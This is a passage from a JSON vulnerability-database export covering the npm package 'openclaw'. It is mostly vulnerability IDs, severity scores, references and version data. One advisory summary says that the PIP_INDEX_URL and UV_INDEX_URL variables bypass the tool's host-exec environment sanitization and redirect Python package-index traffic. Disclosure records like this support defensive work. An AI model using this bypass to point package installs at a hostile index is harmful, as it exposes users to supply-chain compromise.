e,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"V
CID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"V
CID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"V
CID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"V
CID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"V
CID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"V
CID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11-beta.1"}],"aliases":["GHSA-hh43-q692-2xmq"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a2t8-px5b-nfgd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89853?format=json","vulnerability_id":"VCID-a2wx-7b8h-c3h1","summary":"Open
Claw: PIP_INDEX_URL and UV_INDEX_URL bypass host exec env sanitization and redirect Python package-index traffic\n## Summary\n`PIP_INDEX_URL` and `UV_INDEX_URL` bypass host exec env sanitization and redirect Python package-index traffic\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: high\n- Assessment: v2026.3.28 still allows Python package-index env redirection through host exec, but scope should stay limited to approved or allowlisted package-management exec paths, not arbitrary remote execution.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `7ae1bb0c7799fd0cbd2d4de7b0f5b8039837ab8d` — 2026-03-31T09:53:32+09:00\n\nOpenClaw thanks @nexrin for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41391","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04648","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04661","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04675","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41391"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7ae1bb0c7799fd0cbd2d4de7b0f5b803983
7ab8d","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:25:34Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7ae1bb0c7799fd0cbd2d4de7b0f5b8039837ab8d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7ggg-pvrf-458v","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:25:34Z/"}],"url":"ht
tps://github.com/openclaw/openclaw/security/advisories/GHSA-7ggg-pvrf-458v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41391","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41391"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-bypass-in-package-index-url-handling","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:25:34Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-bypass-in-package-index-url-handling"},{"reference_url":"https://github.com/advisories/GHSA-7ggg-pvrf-458v","reference_id":"GHSA-7ggg-pvrf-458v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7ggg-pvrf-458v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-g
baw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4
wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41391","GHSA-7ggg-pvrf-458v"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilitie
